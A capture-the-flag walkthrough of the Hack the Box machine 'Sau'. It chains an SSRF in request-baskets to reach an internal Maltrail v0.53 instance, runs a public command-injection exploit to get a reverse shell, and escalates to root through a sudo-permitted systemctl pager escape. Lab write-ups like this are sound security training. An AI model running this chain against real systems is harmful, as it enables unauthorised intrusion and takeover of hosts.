a close up of a water droplet with a blue background

Hack the Box: Sau Walkthrough

, ,

Machine Stats




I started by running my standard nmap scan.

nmap -A -T4 -p-                           
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 18:19 EDT
Nmap scan report for
Host is up (0.041s latency).
Not shown: 65531 closed tcp ports (conn-refused)
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Wed, 02 Aug 2023 22:20:24 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Wed, 02 Aug 2023 22:19:58 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Wed, 02 Aug 2023 22:19:59 GMT
|_    Content-Length: 0

Port 80 appears to be filtered which is a little strange, so I access port 55555 instead. I started a feroxbuster scan to see what shakes out.

└─$ feroxbuster -u

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.10.0
 🎯  Target Url            β”‚
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 πŸ‘Œ  Status Codes          β”‚ All Status Codes!
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.10.0
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ”Ž  Extract Links         β”‚ true
 🏁  HTTP methods          β”‚ [GET]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      230l      606w     8700c
302      GET        2l        2w       27c =>
200      GET      360l      928w    13021c
301      GET        2l        3w       39c =>
400      GET        1l       10w       75c
400      GET        1l       10w       75c
400      GET        1l       10w       75c
400      GET        1l       10w       75c
400      GET        1l       10w       75c
400      GET        1l       10w       75c

There was other output but it appeared to just be words in the wordlist appended to the end of the URL, not actual valid content. Pretty much, I only saw /web and /web/baskets in terms of legitimate directories after investigating.

User Flag

Visiting port 55555 at /web shows the following application, noting the banner “Powered by request-baskets | Version: 1.2.1” at the bottom of the page. I did some digging around with this and found some vulnerabilities, one example of which is CVE-2023-27163, or SSRF via the component /api/baskets/{name}.

I created a new bucket to explore the application some more.


Basket 'xso5phv' is successfully created!

Your token is: oiLKarNGG6_IWXJGzMi0E6Jl0lKk2pT9jTL5rghHrn1d

Sending a request using curl to the unique basket URL the application generated for me yields the following:

└─$ curl

Because I remember that port 80 was filtered in our nmap scan, and we can use this application to mess with HTTP requests, I decided to see if I could access the contents of the webpage via the basket that was created for me. I set my settings to be similar to the below:

And resend my earlier curl request, truncating the output below to save space.


        <div id="bottom_blank"></div>
        <div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>

        <ul class="custom-menu">
            <li data-action="hide_threat">Hide threat</li>
            <li data-action="report_false_positive">Report false positive</li>

We now have a new application to investigate- Maltrail version 0.53. Some Google searching yields the following extremely promising result. Weaponized Exploit for Maltrail v0.53 Unauthenticated OS Command Injection (RCE) In my rush to play with this exploit, I didn’t see the following detail, which I fixed later:

"In this specific case, the username parameter of the login page doesn't properly sanitize the input, allowing an attacker to inject OS commands"

With this being said, I now change the bucket application’s settings to the following:

I now launched Metasploit and setup a listener with exploit/multi/handler for a basic command shell. With the listener running, I run the exploit.

python3 exploit.py 4444

Running exploit on


[*] Started reverse TCP handler on 
[*] Command shell session 1 opened ( -> at 2023-08-02 19:48:25 -0400

Shell Banner:
$ whoami

So let’s get the user flag.

cat /home/puma/user.txt

Privilege Escalation & Root Flag

I now upgrade the shell to make it a meterpreter shell/session to make for easier uploading and downloading of files.

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 
[*] Sending stage (1017704 bytes) to
[*] Meterpreter session 2 opened ( -> at 2023-08-02 19:52:57 -0400
[*] Command stager progress: 100.00% (773/773 bytes)

One of the first things I check when I am inside an account in hackthebox is ‘sudo -l’ – this yields results once again here as well.

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

A general practice I do is to take anything that comes up after running sudo -l and search it on GTFObins.

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.


This invokes the default pager, which is likely to be less, other functions may apply.

sudo systemctl

So I ran ‘sudo /usr/bin/systemctl status trail.service’ and then tried to enter ‘!sh’ in my shell spawned from the Meterpreter session, but it didn’t work- it seemed like the pager wasn’t returning output in the same way or that Metasploit was returning it incorrectly. So I went back to my sessions and picked the raw command shell I got originally before upgrading.

$ sudo /usr/bin/systemctl status trail.service 
sudo /usr/bin/systemctl status trail.service 

WARNING: terminal is not fully functional -  (press RETURN)

And now we have root.

# whoami 

cat /root/root.txt cat 

/root/root.txt d425***********************e024
Scroll to Top